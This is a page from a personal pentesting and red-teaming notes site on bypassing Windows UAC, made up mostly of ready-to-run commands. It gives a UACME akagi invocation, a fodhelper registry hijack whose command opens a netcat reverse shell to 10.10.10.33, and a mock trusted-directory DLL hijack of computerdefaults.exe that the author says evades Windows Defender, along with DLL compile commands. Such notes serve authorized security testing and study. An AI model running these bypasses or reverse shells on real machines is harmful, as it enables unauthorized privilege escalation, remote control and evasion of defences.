🧙
Pentesting & Red Teaming Notes
  • Windows
    • Recon - Initial Access
    • Privilege Escalation
      • Enable Privs
      • SeBackupPrivilege
      • SeImpersonatePrivilege
      • SeDebugPrivilege
    • Kerberoasting
    • Lateral Movement
    • MSSQL
    • AD Related
    • Bypass-Evasion Techniques
    • Post Exploitation
    • Miscellaneous
    • UAC Bypass
    • Exploits
      • MS03-026 - RPC DCOM
      • MS04-011 - LSASRV
      • MS08-67 - Netapi
      • MS17-010 - Eternalblue
      • CVE-2019-1388
      • CVE-2020-1472 - Zerologon
      • CVE-2020-16938
      • CVE-2021-1675 - PrintNightmare
      • CVE-2022-21999 - SpoolFool
    • Coerced Auth
  • Linux
  • Abusing Active Directory ACLs
    • ReadLAPSPassword
    • WriteDacl
    • GenericWrite
    • ForceChangePassword
    • WriteOwner
  • Port Forwarding - Tunneling
  • Cloud
  • Mobile
  • Malware Development
    • Process Migration
    • Process Hollowing
    • Dynamic API Resolution
    • Suspended Threads
    • PPID Spoofing
    • Thread Stack Spoofing
    • ETW (Event Tracing for Windows)
    • AMSI Bypass
    • Tools
    • Esoteric
Powered by GitBook
On this page
  • UACME
  • Technique 1
  • Technique 2
  1. Windows

UAC Bypass

PreviousMiscellaneousNextExploits

Last updated 2 years ago

UACME

Akagi-UACME will %99 be a win here

akagi64 61 c:\windows\system32\cmd.exe

Technique 1

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value 'c:\users\morph3\nc.exe -e cmd.exe 10.10.10.33 443' -Force

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

Now simply type "fodhelper" and you should have the shell.

To undo this,

Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

Technique 2

This technique is pretty solid and does not get detected by the windows defender

TLDR; you can fool windows by creating a folder called c:\windows \System32\ you can put a windows binary(auto elevated ones) there and hijack dlls. There is a full list of hijackable binaries here,

mkdir "C:\Windows \"
mkdir "C:\Windows \System32\"
copy "C:\Windows\System32\computerdefaults.exe" "C:\Windows \System32\computerdefaults.exe"
copy ".\morph.dll" "C:\Windows \System32\Secur32.dll"
"C:\Windows \System32\computerdefaults.exe"
  • You might need to compile your binary in 64bit arch

# x64
x86_64-w64-mingw32-gcc -shared -o test.dll test.cpp

# x86
i686-w64-mingw32-gcc -shared -o test-x86.dll test.cpp

https://github.com/hfiref0x/UACME
https://twitter.com/xxByte/status/1381978562643824644
https://redteamer.tips/uac-bypass-through-trusted-folder-abuse/
https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows